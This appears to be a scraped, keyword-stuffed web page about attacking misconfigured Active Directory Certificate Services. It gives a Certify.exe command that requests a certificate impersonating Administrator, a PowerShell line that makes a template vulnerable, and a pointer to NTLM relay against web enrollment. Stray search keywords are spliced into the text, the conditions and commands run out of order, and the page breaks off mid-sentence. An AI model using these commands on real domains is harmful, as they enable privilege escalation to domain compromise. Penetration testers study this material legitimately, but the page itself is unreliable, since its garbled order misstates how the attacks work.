Hacktricks Adcs 【2025】

Introduction Active Directory Certificate Services (ADCS) is Microsoft’s PKI (Public Key Infrastructure) implementation. When integrated with Active Directory, ADCS enables certificate-based authentication, smart card logons, and encryption. However, misconfigurations in ADCS are notoriously common and can lead to domain compromise, privilege escalation, and persistence.

# Using PowerMad (Set-PKITemplate -Identity VulnTemplate -EnrolleeSuppliesSubject $true -AddEKUs @("Client Authentication")) Condition : CA is configured with EDITF_ATTRIBUTESUBJECTALTNAME2 flag. (Allows any requester to specify SAN.) hacktricks adcs

Certify.exe request /ca:DC.CONTOSO.LOCAL\CONTOSO-CA /template:User /altname:Administrator Condition : ADCS web enrollment interfaces ( /certsrv/ , /CertSrv/ , /certsrv/mscep/ ) are enabled and not configured with extended protection or HTTPS. ADCS enables certificate-based authentication

: Request any template with Client Authentication EKU and include SAN. smart card logons

(using ntlmrelayx.py from Impacket):